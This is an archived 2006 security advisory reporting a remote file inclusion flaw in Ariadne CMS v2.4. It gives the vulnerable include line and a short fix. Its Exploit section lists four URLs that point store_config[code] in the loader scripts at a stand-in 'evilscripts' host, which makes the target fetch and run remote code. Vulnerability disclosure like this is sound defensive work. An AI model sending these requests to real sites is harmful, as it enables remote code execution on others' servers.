Computer Security

Security Advisory: Ariadne v2.4 (store_config[code]) Remote File Include Vuln
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

  Ariadne v2.4 (store_config[cod
e]) Remote File Include Vuln

  SazCart <= 1.5 (cart.php) Remote File Include Vulnerability

  [Full-disclosure] [x0n3-h4ck.org] Bug on Drake CMS v0.2

From:cw.cybersecurity_(at)_gmail.com <cw.cybersecurity_(at)_gmail.com>
Date:05.11.2006
Subject:Ariadne v2.4 (store_config[code]) Remote File Include Vuln

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Ariadne v2.4 (store_config[code]) Remote File Include Vuln

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Found: Cyber-Security.Org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Version: 2.4

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Code: include_once($store_config['code']."modules/mod_debug.
php");

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

F.X:

1- open files

2- add this code before wrong codes

require("../www/ariadne.inc");

3- save files

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Exploit:

www.target.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http:
//evilscripts ?
www.target.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http:
//evilscripts ?
www.target.com/script_path/lib/includes/loader.soap.php?store_config[code]=http:
//evilscripts ?
www.target.com/script_path/lib/includes/loader.web.php?store_config[code]=http:
//evilscripts ?


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

Script Download: http://www.ariadne-cms.org/download/ariadne/ariadne.2.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server